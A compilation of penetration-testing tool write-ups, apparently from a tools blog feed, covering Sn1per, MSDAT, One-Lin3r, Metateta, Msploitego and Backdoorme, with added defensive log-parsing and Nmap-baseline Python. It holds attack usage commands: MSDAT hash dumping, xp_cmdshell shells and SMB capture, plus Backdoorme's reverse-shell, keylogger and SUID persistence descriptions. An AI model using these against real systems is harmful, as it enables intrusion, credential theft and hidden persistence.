Sn1per v5.0 – Automated Pentest Recon Scanner

Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting add-on for professional penetration testers, bug bounty researchers and corporate security teams to manage large environments and pentest scopes.

SN1PER PROFESSIONAL FEATURES:
- Professional reporting interface
- Slideshow for all gathered screenshots
- Searchable and sortable DNS, IP and open port database
- Categorized host reports
- Quick links to online recon tools and Google hacking queries
- Personalized notes field for each host

SN1PER COMMUNITY FEATURES:
- Automatically collects basic recon (i.e. whois, ping, DNS, etc.)
- Automatically launches Google hacking queries against a target domain
- Automatically enumerates open ports via Nmap port scanning
- Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
- Automatically checks for sub-domain hijacking
- Automatically runs targeted Nmap scripts against open ports
- Automatically runs targeted Metasploit scan and exploit modules
- Automatically scans all web applications for common vulnerabilities
- Automatically brute forces ALL open services
- Automatically tests for anonymous FTP access
- Automatically runs WPScan, Arachni and Nikto for all web services
- Automatically enumerates NFS shares
- Automatically tests for anonymous LDAP access
- Automatically enumerates SSL/TLS ciphers, protocols and vulnerabilities
- Automatically enumerates SNMP community strings, services and users
- Automatically lists SMB users and shares, checks for NULL sessions and exploits MS08-067
- Automatically exploits vulnerable JBoss, Java RMI and Tomcat servers
- Automatically tests for open X11 servers
- Auto-pwn added for Metasploitable, ShellShock, MS08-067, default Tomcat creds
- Performs high-level enumeration of multiple hosts and subnets
- Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
- Automatically gathers screenshots of all web sites
- Create individual workspaces to store all scan output

AUTO-PWN:
- Drupal Drupalgeddon2 RCE CVE-2018-7600
- GPON Router RCE CVE-2018-10561
- Apache Struts 2 RCE CVE-2017-5638
- Apache Struts 2 RCE CVE-2017-9805
- Apache Jakarta RCE CVE-2017-5638
- Shellshock GNU Bash RCE CVE-2014-6271
- HeartBleed OpenSSL Detection CVE-2014-0160
- Default Apache Tomcat Creds CVE-2009-3843
- MS Windows SMB RCE MS08-067
- Webmin File Disclosure CVE-2006-3392
- Anonymous FTP Access
- PHPMyAdmin Backdoor RCE
- PHPMyAdmin Auth Bypass
- JBoss Java De-Serialization RCEs

KALI LINUX INSTALL:
```
./install.sh
```

DOCKER INSTALL:
Credits: @menzow
Docker Install: https://github.com/menzow/sn1per-docker
Docker Build: https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/

Example usage:
```
$ docker pull menzo/sn1per-docker
$ docker run --rm -ti menzo/sn1per-docker sniper menzo.io
```

USAGE:
```
[*] NORMAL MODE
sniper -t|--target

[*] NORMAL MODE + OSINT + RECON
sniper -t|--target <TARGET> -o|--osint -re|--recon

[*] STEALTH MODE + OSINT + RECON
sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon

[*] DISCOVER MODE
sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORKSPACE_ALIAS>

[*] SCAN ONLY SPECIFIC PORT
sniper -t|--target <TARGET> -m port -p|--port <portnum>

[*] FULLPORTONLY SCAN MODE
sniper -t|--target <TARGET> -fp|--fullportonly

[*] PORT SCAN MODE
sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>

[*] WEB MODE - PORT 80 + 443 ONLY!
sniper -t|--target <TARGET> -m|--mode web

[*] HTTP WEB PORT MODE
sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>

[*] HTTPS WEB PORT MODE
sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>

[*] ENABLE BRUTEFORCE
sniper -t|--target <TARGET> -b|--bruteforce

[*] AIRSTRIKE MODE
sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike

[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED
sniper -f|--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>

[*] ENABLE LOOT IMPORTING INTO METASPLOIT
sniper -t|--target <TARGET>

[*] LOOT REIMPORT FUNCTION
sniper -w <WORKSPACE_ALIAS> --reimport

[*] UPDATE SNIPER
sniper -u|--update
```

MODES:
- NORMAL: Performs a basic scan of targets and open ports using both active and passive checks for optimal performance.
- STEALTH: Quickly enumerates single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.
- AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts/IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
- NUKE: Launches a full audit of multiple hosts specified in a text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
- DISCOVER: Parses all hosts on a subnet/CIDR (i.e. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
- PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
- FULLPORTONLY: Performs a full detailed port scan and saves results to XML.
- WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
- WEBPORTHTTP: Launches a full HTTP web application scan against a specific host and port.
- WEBPORTHTTPS: Launches a full HTTPS web application scan against a specific host and port.
- UPDATE: Checks for updates and upgrades all components used by sniper.
- REIMPORT: Reimports all workspace files into Metasploit and reproduces all reports.
- RELOAD: Reloads the master workspace report.

SAMPLE REPORT: https://gist.github.com/1N3/8214ec2da2c91691bcbc

Download Sn1per v5.0

Link: http://feedproxy.google.com/~r/PentestTools/~3/Z_yHqaJ_y1U/sn1per-v50-automated-pentest-recon.html

MSDAT – Microsoft SQL Database Attacking Tool

MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL databases remotely.

Usage examples of MSDAT:
- You have a Microsoft SQL database listening remotely and you want to find valid credentials in order to connect to the database
- You have a valid Microsoft SQL account on a database and you want to escalate your privileges
- You have a valid Microsoft SQL account and you want to execute commands on the operating system hosting this DB (xp_cmdshell)

Tested on Microsoft SQL database 2005, 2008 and 2012.

Changelog
Version 1.0 (2017/02/15): first version released

Features
Thanks to MSDAT (Microsoft SQL Database Attacking Tool), you can:
- get technical information (e.g. database version) of a MSSQL database without being authenticated
- search MSSQL accounts with a dictionary attack
- test each login as password (authentication required)
- get a Windows shell on the database server with xp_cmdshell
- download files remotely with: OLE Automation, bulkinsert, openrowset
- upload files on the server with: OLE Automation, openrowset
- capture a SMB authentication thanks to: bulkinsert, openrowset, xp_dirtree, xp_fileexist, xp_getfiledetails
- steal MSSQL hashed passwords, on any MSSQL version
- scan ports through the database: openrowset
- execute SQL requests on a remote MSSQL server through the database (target) with: bulkinsert, openrowset
- list files/directories with: xp_subdirs, xp_dirtree
- list drives/media with: xp_fixeddrives, xp_availablemedia
- create a folder with: xp_create_subdir

Installation
Some dependencies must be installed in order to run MSDAT. In Ubuntu:
```
sudo apt-get install freetds-dev   # or download FreeTDS from http://www.freetds.org/
sudo pip install cython colorlog termcolor pymssql argparse
sudo pip install argcomplete && sudo activate-global-python-argcomplete
```
Add "use ntlmv2 = yes" in your FreeTDS configuration file (e.g. /etc/freetds/freetds.conf or /usr/local/etc/freetds.conf). Example:
```
[global]
    # TDS protocol version
    tds version = 8.0
    use ntlmv2 = yes
```

Examples

Modules
You can list all modules:
```
./msdat.py -h
```
When you have chosen a module (example: all), you can use it and list all features and options of the module:
```
./msdat.py all -h
```
You can find out whether a specific module can be used on a MSSQL server thanks to the --test-module option. This option is implemented in each MSDAT module.

all module
The all module allows you to run all modules (depends on options that you have purchased).
```
python msdat.py all -s $SERVER
```
If you want:
- to use your own account file for the dictionary attack
- to try multiple passwords for a user without being asked
- to define your own timeout value
```
./msdat.py all -s $SERVER -p $PORT --accounts-file accounts.txt --login-timeout 10 --force-retry
```
In each module, you can define the charset to use with the --charset option.

mssqlinfo module
To get technical information about a remote MSSQL server without being authenticated:
```
./msdat.py mssqlinfo -s $SERVER -p $PORT --get-max-info
```
This module uses the TDS protocol and the SQL Browser service to get information.

passwordguesser module
This module allows you to search for valid credentials:
```
./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --force-retry --search
```
The --force-retry option allows testing multiple passwords for each user without being asked. You can specify your own account file with the --accounts-file option:
```
./msdat.py passwordguesser -s $SERVER -p $PORT --search --accounts-file accounts.txt --force-retry
```

passwordstealer module
To dump hashed passwords:
```
./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --dump --save-to-file test.txt
```
This module has been tested on SQL Server 2000, 2005, 2008 and 2014.

xpcmdshell module
To execute system commands thanks to xp_cmdshell (https://msdn.microsoft.com/en-us/library/ms190693.aspx):
```
./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --shell
```
The previous command gives you an interactive shell on the remote database server. If xp_cmdshell is not enabled, the --enable-xpcmdshell option can be used in this module to activate it:
```
./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --enable-xpcmdshell --disable-xpcmdshell --shell
```
The --enable-xpcmdshell option enables xp_cmdshell if it is not enabled (it is not enabled by default). The --disable-xpcmdshell option disables xp_cmdshell if it is enabled.

smbauthcapture module
Thanks to this module, you can capture a SMB authentication:
```
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --capture $MY_IP_ADDRESS --share-name SHARE
```
To capture the SMB authentication, the auxiliary/server/capture/smb (http://www.rapid7.com/db/modules/auxiliary/server/capture/smb) module of Metasploit could be used:
```
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > exploit
```
The capture command of this module tries to capture a SMB authentication thanks to the xp_dirtree, xp_fileexist or xp_getfiledetails procedure. If you want to choose the procedure used to capture the authentication:
```
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-dirtree-capture 127.0.0.1
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-fileexist-capture 127.0.0.1
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-getfiledetails-capture 127.0.0.1
```
You can change the share name with the --share-name option.

oleautomation module
This module can be used to read/write files on the database server. The following command reads the file temp.txt stored on the database server:
```
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'
```
To write a string into a file (temp.txt) remotely:
```
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --write-file 'C:\Users\Administrator\Desktop\temp.txt' 'a\nb\nc\nd\ne\nf'
```
This module can be used to download a file (C:\Users\Administrator\Desktop\temp.txt) stored on the database server:
```
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file 'C:\Users\Administrator\Desktop\temp.txt' temp.txt
```
Also, you can use this module to upload a file (temp.txt) to the target:
```
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --put-file temp.txt 'C:\Users\Administrator\Desktop\temp.txt'
```

bulkopen module
The bulkopen module can be used:
- to read/download files stored on a database server
- to scan ports through the database server
- to execute SQL requests on a remote MSSQL server through the database

To read a file stored on the target, the following command can be used:
```
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'
```
The --method option can be used to specify the method to use: bulkinsert (https://msdn.microsoft.com/en-us/library/ms188365.aspx) or openrowset (https://msdn.microsoft.com/en-us/library/ms190312.aspx):
```
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt' --method openrowset
```
To download a file (C:\Users\Administrator\Desktop\temp.txt):
```
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file 'C:\Users\Administrator\Desktop\temp.txt' temp.txt
```
This module can be used to scan ports (1433 and 1434 of 127.0.0.1) through the database server:
```
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 127.0.0.1 1433,1434 -v
```
You can scan a range of ports:
```
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 127.0.0.1 1433-1438
```
This module can be used to execute SQL requests (e.g. select @@ServerName) on a remote database server (e.g. $SERVER2) through the database ($SERVER):
```
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --request-rdb $SERVER2 $PORT $DATABASE $USER $PASSWORD 'select @@ServerName'
```

xpdirectory module
The xpdirectory module can be used:
- to list files, directories and drives
- to check if a file exists
- to create a directory

To list files in a specific directory:
```
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-files 'C:\'
```
To list directories in a specific directory:
```
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-dir 'C:\'
```
To list drives:
```
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-fixed-drives --list-available-media
```
To check if a file exists:
```
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --file-exists 'C:\' --file-exists 'file.txt'
```
To create a directory:
```
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --create-dir 'C:\temp'
```

search module
The search module can be used to search for a pattern in the column names of tables and views. Useful to search for the pattern %password% in column names, for example. To get column names which contain password patterns (e.g. passwd, password, motdepasse, clave):
```
./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns
```
If you want to also see column names whose columns contain no data, use the option --show-empty-columns. To search for a specific pattern in the column names of views and tables:
```
./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns
```

Download MSDAT
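From the defending side, the passwordguesser and xpcmdshell modules above leave characteristic traces in the SQL Server error log: bursts of "Login failed for user" lines from one client, and "Configuration option 'xp_cmdshell' changed from 0 to 1" lines when the extended procedure is switched on at runtime (the same applies to 'Ole Automation Procedures', which the oleautomation module needs). The following Python is an added example, not part of MSDAT; the log lines are constructed in the ERRORLOG layout (timestamp, source column, message) with made-up hosts and users, and the burst threshold and window are assumptions to tune per environment.

```python
"""Detect dictionary attacks and runtime enabling of risky extended procedures
from SQL Server error-log lines. Added example; not MSDAT code."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample ERRORLOG lines (hosts, users and times are made up).
SAMPLE_LOG = """\
2017-02-15 10:00:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2017-02-15 10:00:01.40 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2017-02-15 10:00:01.70 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 10.0.0.5]
2017-02-15 10:00:02.00 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2017-02-15 10:00:02.30 Logon       Login failed for user 'backup'. Reason: Could not find a login matching the name provided. [CLIENT: 10.0.0.5]
2017-02-15 10:00:02.60 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2017-02-15 10:30:00.00 Logon       Login failed for user 'alice'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.9]
2017-02-15 10:41:12.00 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2017-02-15 10:41:12.50 spid55      Configuration option 'Ole Automation Procedures' changed from 0 to 1. Run the RECONFIGURE statement to install.
2017-02-15 11:00:00.00 spid12      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) (?P<src>\S+)\s+(?P<msg>.*)$")
FAILED_RE = re.compile(r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]")
CONFIG_RE = re.compile(r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d) to (?P<new>\d)")
# Options whose runtime enabling deserves review; extend with your own policy.
RISKY_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures"}


def parse(text):
    """Yield (timestamp, source, message) for every well-formed log line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"), m["src"], m["msg"]


def failed_login_bursts(text, threshold=5, window=timedelta(minutes=1)):
    """Return {client_ip: (max_failures_in_window, distinct_users)} for clients
    that exceed `threshold` failed logins inside any sliding `window`; many
    distinct user names from one client is the dictionary-attack signature."""
    per_client = defaultdict(list)
    for ts, _src, msg in parse(text):
        f = FAILED_RE.search(msg)
        if f:
            per_client[f["client"]].append((ts, f["user"]))
    hits = {}
    for client, events in per_client.items():
        events.sort()
        start, best_count, best_users = 0, 0, set()
        for end, (ts, _user) in enumerate(events):
            while ts - events[start][0] > window:
                start += 1
            count = end - start + 1
            if count > best_count:
                best_count = count
                best_users = {u for _, u in events[start:end + 1]}
        if best_count >= threshold:
            hits[client] = (best_count, len(best_users))
    return hits


def risky_config_changes(text):
    """Return (option, old, new) for every runtime change to a risky option."""
    out = []
    for _ts, _src, msg in parse(text):
        c = CONFIG_RE.search(msg)
        if c and c["opt"] in RISKY_OPTIONS:
            out.append((c["opt"], int(c["old"]), int(c["new"])))
    return out


def newly_enabled(text):
    """Only the 0 -> 1 transitions: the events worth an alert."""
    return [opt for opt, old, new in risky_config_changes(text) if old == 0 and new == 1]


if __name__ == "__main__":
    print("bursts:", failed_login_bursts(SAMPLE_LOG))
    print("enabled at runtime:", newly_enabled(SAMPLE_LOG))
```

Both checks work on the text log alone, so they can run on a copy shipped off the database host; a 0 to 1 flip of either option outside an approved change window, or a burst from a client that is not a known application server, is the case to escalate.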

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZIGtMzYR_7Q/msdat-microsoft-sql-database-attacking.html

One-Lin3r v1.1 – Gives You One-Liners That Aids In Penetration Testing Operations

One-Lin3r is a simple and lightweight framework inspired by the web-delivery module in Metasploit. It consists of various one-liners that aid in penetration testing operations:
- Reverser: Give it an IP & port and it returns a reverse shell liner ready for copy & paste.
- Dropper: Give it an uploaded-backdoor URL and it returns a download-&-execute liner ready for copy & paste.
- Other: Holds liners with the general purpose of helping in penetration testing (e.g. Mimikatz, PowerUp, etc.) on the trending OSes (Windows, Linux, and macOS). "More OSes can be added too."

Features
- Search for any one-liner in the database by its full name or partially.
- You can add your own liners by following these steps to create a ".liner" file. Also, you can send it to me directly and it will be added to the framework and credited with your name.
- Autocomplete any framework command, with recommendations in case of typos (in case you love hacking like in the movies).
- Command line arguments can be used to give the framework a resource file to load and execute for automation.
- The ability to reload the database if you added any liner, without restarting the framework.
- You can add any platform to the payloads database just by making a folder in the payloads folder and creating a ".liner" file there.
- More...

The payloads database is not big now because this is the first edition, but it will get bigger with updates and contributions.

Usage

Command line arguments
```
usage: one-lin3r [-h] [-r R] [-x X] [-q]

optional arguments:
  -h, --help  show this help message and exit
  -r          Execute a resource file (history file).
  -x          Execute a specific command (use ; for multiples).
  -q          Quit mode (no banner).
```

Framework commands
```
Command          Description
--------         -------------
help/?           Show this help menu
list/show        List payloads you can use in the attack.
search           Search payloads for a specific one
use <payload>    Use an available payload
info <payload>   Get information about an available payload
banner           Display banner
reload/refresh   Reload the payloads database
check            Prints the core version and database version then checks for them online.
history          Display the most important command line history from the beginning
save_history     Save command line history to a file
exit/quit        Exit the framework
```

Installing and requirements
To make the tool work at its best you must have:
- Python 3.x or 2.x (3 preferred).
- Linux (tested on Kali rolling), Windows, or macOS (tested on 10.11).
- The requirements mentioned in the next few lines.

Installing
For Windows (after downloading the ZIP and unzipping it):
```
python -m pip install ./One-Lin3r-master
one-lin3r -h
```
For Linux:
```
git clone https://github.com/D4Vinci/One-Lin3r.git
apt-get install libncurses5-dev
pip install ./One-Lin3r
one-lin3r -h
```

Updating the framework or the database
On Linux, while outside the directory:
```
cd One-Lin3r && git pull && cd ..
pip install ./One-Lin3r --upgrade
```
On Windows, if you don't have git installed, re-download the framework ZIP.

Download One-Lin3r

Link: http://feedproxy.google.com/~r/PentestTools/~3/elxDfxPSrg8/one-lin3r-v11-gives-you-one-liners-that.html

Metateta – Automated Tool For Scanning And Exploiting Network Protocols Using Metasploit

Metateta is an automated tool for scanning and exploiting network protocols using Metasploit, for faster pen testing of large networks.

What You Can Do
- Scanning with all Metasploit modules for a specific network protocol like smb, smtp, snmp
- Run all auxiliary modules against a specific network protocol
- Run all possible Metasploit exploits for a specific network protocol (not recommended for real pen testing)
- Run against one target, a network, or even a text file with targets

Usage examples
```
run.py -R 192.168.1.15-255 -p smb -x exploit
run.py -r 192.168.1.15 -p smtp -x scan
run.py -f hosts.txt -p smb -x auxiliary
```

Hossam Mohamed - @wazehell

Download Metateta

Link: http://feedproxy.google.com/~r/PentestTools/~3/JS2U_1rLV1I/metateta-automated-tool-for-scanning.html

Msploitego – Pentesting Suite For Maltego Based On Data In A Metasploit Database

msploitego leverages the data gathered in a Metasploit database by enumerating and creating specific entities for services. Services like samba, smtp, snmp and http have transforms to enumerate even further. Entities can either be loaded from a Metasploit XML file or taken directly from the Postgres msf database.

Requirements
- Python 2.7
- Has only been tested on Kali Linux
- Software installations: Metasploit, nmap, enum4linux, smtp-check, nikto

Installation
- Check out the repository and update the transform path inside Maltego.
- In Maltego, import the config from msploitego/src/msploitego/resources/maltego/msploitego.mtz.

General Use

Using an exported Metasploit XML file:
- Run a db_nmap scan in Metasploit, or import a previous scan:
```
msf> db_nmap -vvvv -T5 -A -sS -ST -Pn
msf> db_import /path/to/your/nmapfile.xml
```
- Export the database to an XML file:
```
msf> db_export -f xml /path/to/your/output.xml
```
- In Maltego, drag a MetasploitDBXML entity onto the graph.
- Update the entity with the path to your Metasploit database file.
- Run the MetasploitDB transform to enumerate hosts.
- From there, several transforms are available to enumerate the services and vulnerabilities stored in the Metasploit DB.

Using Postgres:
- Drag and drop a Postgresql DB entity onto the canvas and enter the DB details.
- Run the Postgresql transforms directly against a running DB.

Notes
Instead of running a nikto scan directly from Maltego, I've opted to include a field for a Nikto XML file. Nikto can take a long time to run, so it is best to manage that directly from the OS.

TODOs
- Connect directly to the postgres database (in progress)
- Much, much, much more transforms for actions on generated entities.

Download Msploitego
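Both Sn1per's FULLPORTONLY mode (which saves its port scan to XML) and the db_nmap / db_import workflow above produce or consume Nmap's XML output. A defender can read the same file to compare what is actually exposed against an approved baseline, which is how a scan like this becomes a control rather than just recon. The Python below is an added example, not code from Sn1per, msploitego or Metasploit; the XML fragment is constructed in Nmap's schema with made-up hosts in the 192.0.2.0/24 documentation range, and the baseline is an assumption you would maintain per host.

```python
"""Parse Nmap XML output and report open ports that are not in an
expected-exposure baseline. Added example; not Sn1per, msploitego or
Metasploit code."""
import xml.etree.ElementTree as ET

# Constructed Nmap XML fragment (hosts, ports and products are made up).
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX out.xml 192.0.2.0/29">
  <host><status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd"/></port>
      <port protocol="tcp" portid="8080"><state state="open"/><service name="http" product="Apache Tomcat"/></port>
      <port protocol="tcp" portid="3306"><state state="filtered"/><service name="mysql"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="1433"><state state="open"/><service name="ms-sql-s"/></port>
    </ports>
  </host>
  <host><status state="down"/>
    <address addr="192.0.2.12" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

# Assumed baseline: the (protocol, port) pairs each host is approved to expose.
BASELINE = {
    "192.0.2.10": {("tcp", 22), ("tcp", 80)},
    "192.0.2.11": {("tcp", 445)},
}


def open_ports(xml_text):
    """Return {ipv4: {(proto, port): service_name}} for every host that is up.
    Ports in any state other than 'open' (closed, filtered) are ignored."""
    result = {}
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") == "ipv4"), None)
        if addr is None:
            continue
        services = {}
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            name = svc.get("name", "unknown") if svc is not None else "unknown"
            services[(port.get("protocol"), int(port.get("portid")))] = name
        result[addr] = services
    return result


def unexpected_exposure(xml_text, baseline):
    """Return {ip: [(proto, port, service), ...]} for open ports missing from
    the baseline. A host absent from the baseline has every open port flagged."""
    findings = {}
    for ip, services in open_ports(xml_text).items():
        allowed = baseline.get(ip, set())
        extra = [(proto, port, svc) for (proto, port), svc in sorted(services.items())
                 if (proto, port) not in allowed]
        if extra:
            findings[ip] = extra
    return findings


if __name__ == "__main__":
    for ip, extra in unexpected_exposure(SAMPLE_NMAP_XML, BASELINE).items():
        print(ip, extra)
```

Run it against the real file with `open_ports(open("out.xml").read())`; feeding the findings back into the ticketing or CMDB process turns the periodic scan into an inventory drift check.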

Link: http://feedproxy.google.com/~r/PentestTools/~3/NL3Bxk8kM2s/msploitego-pentesting-suite-for-maltego.html

Backdoorme – Powerful Auto-Backdooring Utility

Tools like Metasploit are great for exploiting computers, but what happens after you've gained access to a computer? Backdoorme answers that question by unleashing a slew of backdoors to establish persistence over long periods of time. Once an SSH connection has been established with the target, Backdoorme's strengths can come to fruition. Unfortunately, Backdoorme is not a tool to gain root access, only to keep that access once it has been gained.

Please only use Backdoorme with explicit permission – please don't hack without asking.

Usage
Backdoorme is split into two parts: backdoors and modules.
- Backdoors are small snippets of code which listen on a port and redirect to an interpreter, like bash. There are many backdoors written in various languages to give variety.
- Modules make the backdoors more potent by running them more often, for example every few minutes or whenever the computer boots. This helps to establish persistence.

Setup
To start Backdoorme, first ensure that you have the required dependencies.

For Python 3.5+:
```
$ sudo apt-get install python3 python3-pip python3-tk nmap
$ cd backdoorme/
$ virtualenv --python=python3.5 env
$ source env/bin/activate
(env) $ pip install -r requirements.txt
```
For Python 2.7:
```
$ sudo python dependencies.py
```

Getting Started
Launching Backdoorme:
```
$ python master.py
```
To add a target:
```
>> addtarget
Target Hostname: 10.1.0.2
Username: victim
Password: password123
 + Target 1 Set!
>>
```

Backdoors
To use a backdoor, simply run the "use" keyword.
```
>> use shell/metasploit
 + Using current target 1.
 + Using Metasploit backdoor...
(msf) >>
```
From there, you can set options pertinent to the backdoor. Run either "show options" or "help" to see a list of parameters that can be configured. To set an option, simply use the "set" keyword.
```
(msf) >> show options
Backdoor options:
Option   Value   Description            Required
------   -----   -----------            --------
name     initd   name of the backdoor   False
...
(msf) >> set name apache
 + name => apache
(msf) >> show options
Backdoor options:
Option   Value    Description            Required
------   -----    -----------            --------
name     apache   name of the backdoor   False
...
```
As in Metasploit, backdoors are organized by category.

Auxiliary
- keylogger: Adds a keylogger to the system and gives the option to email results back to you.
- simplehttp: Installs Python's SimpleHTTP server on the client.
- user: Adds a new user to the target.
- web: Installs an Apache server on the client.

Escalation
- setuid: The SetUID backdoor works by setting the setuid bit on a binary while the user has root access, so that when that binary is later run by a user without root access, the binary is executed with root access. By default, this backdoor flips the setuid bit on nano, so that if root access is ever lost, the attacker can SSH back in as an unprivileged user and still be able to run nano (or any chosen binary) as root ('nano /etc/shadow'). Note that root access is initially required to deploy this escalation backdoor.
- shell: The shell backdoor is a privilege escalation backdoor, similar to (but more specific than) its SetUID escalation brother. It duplicates the bash shell to a hidden binary and sets the SUID bit. Note that root access is initially required to deploy this escalation backdoor. To use, while SSHed in as an unprivileged user, simply run ".bash -p", and you will have root access.

Shell
- bash: Uses a simple bash script to connect to a specific IP and port combination and pipe the output into bash.
- bash2: A slightly different (and more reliable) version of the above bash backdoor which does not prompt for the password on the client side.
- sh: Similar to the first bash backdoor, but redirects input to /bin/sh.
- sh2: Similar to the second bash backdoor, but redirects input to /bin/sh.
- metasploit: Employs msfvenom to create a reverse_tcp binary on the target, then runs the binary to connect to a meterpreter shell.
- java: Creates a socket connection using libraries from Java and compiles the backdoor on the target.
- ruby: Uses Ruby's libraries to create a connection, then redirects to /bin/bash.
- netcat: Uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell.
- netcat_traditional: Utilizes netcat-traditional's -e option to create a reverse shell.
- perl: A script written in Perl which redirects output to bash and renames the process to look less conspicuous.
- php: Runs a PHP backdoor which sends output to bash. It does not automatically install a web server, but instead uses the web module.
- python: Uses a short Python script to perform commands and send output back to the user.
- web: Ships a web server to the target, then uploads msfvenom's PHP reverse_tcp backdoor and connects to the host. Although this is also a PHP backdoor, it is not the same backdoor as the above php backdoor.

Access
- remove_ssh: Removes the SSH server on the client. Often good to use at the end of a Backdoorme session to remove all traces.
- ssh_key: Creates an RSA key and copies it to the target for a passwordless SSH connection.
- ssh_port: Adds a new port for SSH.

Windows
- windows: Uses msfvenom to create a Windows backdoor.

Modules
Every backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the "add" keyword.
```
(msf) >> add poison
 + Poison module added
```
